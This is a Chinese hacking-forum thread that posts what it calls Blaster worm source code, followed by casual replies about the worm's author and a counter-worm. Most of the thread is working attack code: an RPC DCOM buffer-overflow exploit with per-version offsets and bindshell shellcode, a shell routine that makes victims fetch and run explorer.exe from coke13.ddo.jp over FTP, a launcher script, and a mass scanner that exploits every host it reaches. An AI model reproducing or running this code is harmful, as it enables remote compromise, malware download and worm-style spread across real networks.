20CN网络安全小组论坛 - 病毒专区 - 冲击波病毒源代码【请勿用于非法用途】

论坛: 病毒专区标题: 冲击波病毒源代码【请勿用于非法用途】

作者: abctm [abctm]

版主

VDCOM.c
/* RPC DCOM WORM v 2.2 -
* originally by volkam, fixed and beefed by uv/graff
* even more original concept by LSD-pl.net
* original code by HDM
*
* --
* This code is in relation to a specific DDOS IRCD botnet project.
* You may edit the code, and define which ftp to login
* and which .exeutable file to recieve and run.
* I use spybot, very convienent
* -
* So basicly script kids and brazilian children, this is useless to you
*
* -
* shouts: darksyn - true homie , giver of 0d4yz, and testbeds
* volkam - top sekret agent man
* ntfx - master pupil
* jpahk - true homie #2
*
* Legion2000 Security Research (c) 2003
* -
* enjoy!
**************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <error.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

unsigned char *targets [] =
{
"Windows NT SP4 (english)",
"Windows NT SP5 (chineese)",
"Windows NT SP6 (chineese)",
"Windows NT SP6a (chineese)",
"Windows 2000 NOSP (polish)",
"Windows 2000 SP3 (polish)",
"Windows 2000 SP4 (spanish)",
"Windows 2000 NOSP1 (english)",
"Windows 2000 NOSP2 (english)",
"Windows 2000 SP2-1 (english)",
"Windows 2000 SP2-2 (english)",
"Windows 2000 SP3-2 (english)",
"Windows 2000 NOSP (chineese)",
"Windows 2000 SP1 (chineese)",
"Windows 2000 SP2 (chineese)",
"Windows 2000 SP3 (chineese)",
"Windows 2000 SP4 (chineese)",
"Windows 2000 SP3 (german)",
"Windows 2000 NOSP (japaneese",
"Windows 2000 SP1 (japaneese)",
"Windows 2000 SP2 (japaneese)",
"Windows 2000 NOSP (korean)",
"Windows 2000 SP1 (korean)",
"Windows 2000 SP2 (korean)",
"Windows 2000 NOSP (mexican)",
"Windows 2000 SP1 (mexican)",
"Windows XP NOSP (english)",
"Windows SP1-2 (english)",
"Windows 2k3 (english)",
"Windows 2000 SP3 (german)",
"Windows 2000 SP4-1 (german)",
"Windows 2000 SP4-2 (german)",
"Windows XP SP1 (german)",
"Windows 2000 SERVER SP1 (french)",
"Windows 2000 SERVER SP4 (french)",
"Windows XP NOSP (french)",
"Windows XP SP1 (french)",
"Windows 2000 SP0 (english)",
"Windows 2000 SP1 (english)",
"Windows 2000 SP2 (english)",
"Windows 2000 SP3 (english)",
"Windows 2000 SP4 (english)",
"Windows XP SP0 (english)",
"Windows XP SP1-1 (english)",
"Windows XP SP2 (english)",
"Windows 2000 Advanced Server SP3 (english)",
"ALL/WINXP/WIN2K",
NULL
};

unsigned long offsets [] =
{
0x77e527f3,
0x77cfdaee,
0x77ac0ef0,
0x77c3eaf0,
0x774d3fe3,
0x77292ce4,
0x77133ba5,
0x777416e8,
0x772b49e2,
0x77b524e8,
0x775cfa2e,
0x772ae3e2,
0x778b89e6,
0x772b49e0,
0x77444342,
0x77294cdf,
0x777a882e,
0x77e527f3,
0x778b89e5,
0x772b49df,
0x772ae3e1,
0x778b89e5,
0x772b49df,
0x772ae3e1,
0x778b89e8,
0x77e3afe9,
0x77db37d7,
0x77b05422,
0x77292ce3,
0x77294ce0,
0x7756c2e2,
0x77fc18d4,
0x774b3ee4,
0x7756c2e2,
0x774a75d4,
0x77fc18d4,
0x77e81674,
0x77e829ec,
0x77e824b5,
0x77e8367a,
0x77f92a9b,
0x77e9afe3,
0x77e626ba,
0x77d737db,
0x77e2afc5,
0x010016C6
};

unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"

"\xff\xff\xff\xff" /* return address */

"\xcc\xe0\xfd\x7f" /* primary thread data block */
"\xcc\xe0\xfd\x7f" /* primary thread data block */

/* port 4444 bindshell */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

void
shell(int sock)
{
fd_set fd_read;
char buff[1024], *cmd="echo open coke13.ddo.jp>>o&echo wed>>o&echo wed>>o&echo user wed wed>>o&echo bin>>o&echo get explorer.exe>>o&echo bye>>o&ftp -s:o&explorer.exe&del o&exit\n";

int n;

FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);

send(sock, cmd, strlen(cmd), 0);

while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);

if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

if (FD_ISSET(sock, &fd_read)) {

if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
fprintf(stderr, "EOF\n");
exit(2);
}

if (write(1, buff, n) < 0) break;
}

if (FD_ISSET(0, &fd_read)) {

if((n = read(0, buff, sizeof(buff))) < 0){
fprintf(stderr, "EOF\n");
exit(2);
}

if (send(sock, buff, n, 0) < 0) break;
}

usleep(10);
exit(0);
}

fprintf(stderr, "Connection lost.\n\n");
exit(0);
}

int main(int argc, char **argv)
{

int sock;
int len,len1;
unsigned int target_id;
unsigned long ret;
struct sockaddr_in target_ip;
unsigned short port = 135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
printf("---------------------------------------------------------\n");
printf("- Remote DCOM RPC Buffer Overflow Exploit\n");
printf("- Original code by FlashSky and Benjurry\n");
printf("- Rewritten by HDM\n");
printf("- autoroot/worm by volkam\n");
printf("- Fixed and Beefed by Legion2000 Security Research\n");

if(argc<3)
{
printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
printf("- Targets:\n");
for (len=0; targets[len] != NULL; len++)
{
printf("- %d\t%s\n", len, targets[len]);
}
printf("\n");
exit(1);
}

/* yeah, get over it :) */
target_id = atoi(argv[1]);
ret = offsets[target_id];

printf("- Using return address of 0x%.8x\n", ret);

memcpy(sc+36, (unsigned char *) &ret, 4);

target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(argv[2]);
target_ip.sin_port = htons(port);

if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("- Socket");
return(0);
}

if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
{
perror("- Connect");
return(0);
}

len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);

*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;

memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);

*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;

if (send(sock,bindstr,sizeof(bindstr),0)== -1)
{
perror("- Send");
return(0);
}
len=recv(sock, buf1, 1000, 0);

if (send(sock,buf2,len1,0)== -1)
{
perror("- Send");
return(0);
}
close(sock);
sleep(1);

target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(argv[2]);
target_ip.sin_port = htons(4444);

if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("- Socket");
return(0);
}

if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
{
printf("- Exploit appeared to have failed.\n");
return(0);
}

printf("- Dropping to System Shell...\n\n");

shell(sock);
return(0);
}

地主发表时间: 10/20 21:52

回复: abctm [abctm]

版主

serv

./vdcom 44 $1&
./vdcom 45 $1&
./vdcom 46 $1&
./vdcom 10 $1&
./vdcom 11 $1&
./vdcom 12 $1&
./vdcom 13 $1&
./vdcom 14 $1&
./vdcom 15 $1&
./vdcom 16 $1&
./vdcom 17 $1&
./vdcom 18 $1&
./vdcom 19 $1&
./vdcom 20 $1&
./vdcom 21 $1&
./vdcom 22 $1&
./vdcom 23 $1&
./vdcom 24 $1&
./vdcom 25 $1&
./vdcom 26 $1&
./vdcom 27 $1&
./vdcom 28 $1&
./vdcom 29 $1&
./vdcom 30 $1&
./vdcom 31 $1&
./vdcom 32 $1&
./vdcom 33 $1&
./vdcom 34 $1&
./vdcom 35 $1&
./vdcom 36 $1&
./vdcom 37 $1&
./vdcom 38 $1&
./vdcom 39 $1&
./vdcom 40 $1&
./vdcom 41 $1&
./vdcom 42 $1&
./vdcom 43 $1&
./vdcom 5 $1&
./vdcom 4 $1&
./vdcom 6 $1&
./vdcom 0 $1&
./vdcom 1 $1&
./vdcom 2 $1&
./vdcom 3 $1&
./vdcom 8 $1&
./vdcom 9 $1&
./vdcom 7 $1&

B1层发表时间: 10/20 21:52

回复: abctm [abctm]

版主

SCAN.c

#include <stdio.h>
#include <string.h>
#include <time.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>

#define MAX_SOCKETS 1000
#define TIMEOUT 2

#define S_NONE 0
#define S_CONNECTING 1

struct conn_t {
int s;
char status;
time_t a;
struct sockaddr_in addr;
};
struct conn_t connlist[MAX_SOCKETS];

void init_sockets(void);
void check_sockets(void);
void fatal(char *);

int main(int argc, char *argv[])
{
int done, i, aa, bb, cc, dd, ret, k, ns;
unsigned int port;
time_t scantime;
char ip[20];

if (argc < 3) {
printf("Usage: %s <a-block> <port> [b-block] [c-block]\n", argv[0]);
return -1;
}

done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;

aa = atoi(argv[1]);
if ((aa < 0) || (aa > 255)) {
fatal("Invalid a-range\n");
}

port = (unsigned int)atoi(argv[2]);
if (port == 0)
fatal("Bad port number.\n");

if (argc >= 4) {
bb = atoi(argv[3]);
if ((bb < 0) || (bb > 255))
fatal("Invalid b-range.\n");
}

if (argc >= 5) {
cc = atoi(argv[4]);
if ((cc < 0) || (cc > 255))
fatal("Invalid c-range.\n");
}

init_sockets();

scantime = time(0);

while(!done) {
for (i = 0; i < MAX_SOCKETS; i++) {
if (dd == 255) {
if (cc < 255) {
cc++;
dd = 0;
}
else {
if (bb < 255) {
bb++;
cc = 0;
dd = 0;
}
else {
if (aa < 255) {
aa++;
bb = 0;
cc = 0;
dd = 0;
}
else {
ns = 0;
for (k = 0; k < MAX_SOCKETS; k++) {
if (connlist[k].status > S_NONE)
ns++;
}

if (ns == 0)
break;
}
}
}
}

if (connlist[i].status == S_NONE) {
connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
if (connlist[i].s != -1) {
ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
if (ret == -1) {
printf("Unable to set O_NONBLOCK\n");
close(connlist[i].s);
}
else {
memset((char *)ip, 0, 20);
sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);
connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
if (connlist[i].addr.sin_addr.s_addr == -1)
fatal("Invalid IP.");
connlist[i].addr.sin_family = AF_INET;
connlist[i].addr.sin_port = htons(port);
connlist[i].a = time(0);
connlist[i].status = S_CONNECTING;
dd++;
}
}
}
}

check_sockets();
}

}

void init_sockets(void)
{
int i;

for (i = 0; i < MAX_SOCKETS; i++) {
connlist[i].status = S_NONE;
memset((struct sockaddr_in *)&connlist[i].addr, 0,
sizeof(struct sockaddr_in));
}
}

void check_sockets(void)
{
int i, ret;

for (i = 0; i < MAX_SOCKETS; i++) {
if ((connlist[i].a < (time(0) - TIMEOUT)) &&
(connlist[i].status == S_CONNECTING)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}

else if (connlist[i].status == S_CONNECTING) {
ret = connect(connlist[i].s,
(struct sockaddr *)&connlist[i].addr,
sizeof(struct sockaddr_in));
if (ret == -1) {
if (errno == EISCONN) {
printf("%s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
close(connlist[i].s);
connlist[i].status = S_NONE;
}

if ((errno != EALREADY) && (errno != EINPROGRESS)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}

}

else {
char luck[100];
sprintf(luck,"./serv %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
printf("Attempting RPC/DCOM on %s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
system(luck);
printf("Done with %s Next ...\n");
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
}
}

void fatal(char *err)
{
int i;
printf("Error: %s\n", err);
for (i = 0; i < MAX_SOCKETS; i++) {
if (connlist[i].status >= S_CONNECTING)
close(connlist[i].s);
}
exit(-1);
}

B2层发表时间: 10/20 21:53

回复: abctm [abctm]

版主

B3层发表时间: 10/20 21:54

回复: qfwuying [qfwuying]

一个字~~~帅！！！顶！！！

B4层发表时间: 10/20 22:32

回复: abctm [abctm]

版主

呵呵

B5层发表时间: 10/20 23:14

回复: abctm [abctm]

版主

呵呵

B6层发表时间: 10/23 13:04

回复: hotice [hotice]

论坛用户

听说冲击波病毒的作者是个高中生，到底是不是啊

B7层发表时间: 10/23 16:28

回复: coody [coody]

论坛用户

你管他是还是不是。

B8层发表时间: 10/23 17:17

回复: abctm [abctm]

版主

是的呀！
美国官方宣布FBI在8月29日逮捕了一名"冲击波"(Blaster)病毒嫌疑犯Jeffrey Lee Parson，明尼苏达州18岁的高中生。
附图

他的体形不好

B9层发表时间: 10/23 19:31

回复: smx8796 [smx8796]

论坛用户

可是头上的那几根为数不多的毛还是挺帅的哦
你们说类！
高手。。。。

B10层发表时间: 10/23 20:09

回复: abctm [abctm]

版主

好看，今年的流行款式
你也作一个那样的头

B11层发表时间: 10/24 08:17

回复: kdbilly [kdbilly]

论坛用户

虽然不帅，但看起来智商蛮高用脑过度所以。。掉毛了~
哈哈

B12层发表时间: 10/24 16:00

回复: abctm [abctm]

版主

楼上的想象力丰富啊

B13层发表时间: 10/24 17:34

回复: snntss [snntss]

论坛用户

我同意上铺的看法！

B14层发表时间: 11/29 02:58

回复: snntss [snntss]

论坛用户

我同意上铺的看法

B15层发表时间: 11/29 02:58

回复: bridex [bridex]

论坛用户

垃圾.大部分是照抄其它代码的.

B16层发表时间: 11/29 08:16

回复: afan271314 [afan271314]

论坛用户

楼上的你怎么不超一个啊你可以把他的改一下在弄个冲击波二代

B17层发表时间: 11/29 14:15

回复: bridex [bridex]

论坛用户

你到安焦看看就会明白.

B18层发表时间: 11/29 20:43

回复: lgf [lgf]

论坛用户

呵呵
不错呀~1

B19层发表时间: 11/30 14:28

回复: bridex [bridex]

论坛用户

About ...
新蠕虫作者网上现身-不满微软和杀毒厂商

前言：“冲击波”蠕虫爆发后，大量个人主机及服务器遭受侵袭，各大安全公司，杀毒厂商纷纷推出各种解决方案，不料短短几日内，又出现了来历不明的新蠕虫，经过一些安全专家的反向编译和分析，惊讶的发现，该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁，而且该蠕虫还具有定时自毁功能，显然作者的目标还是有一定的善意因素，但是蠕虫毕竟是蠕虫，因为大量icmp包的发送，还是能够给企业局域网络带来极大的压力，就此，对蠕虫的危害性依然要保持极大的关注和警惕，相关文章可以参见
http://www.donews.com/donews/article/5/50423.html

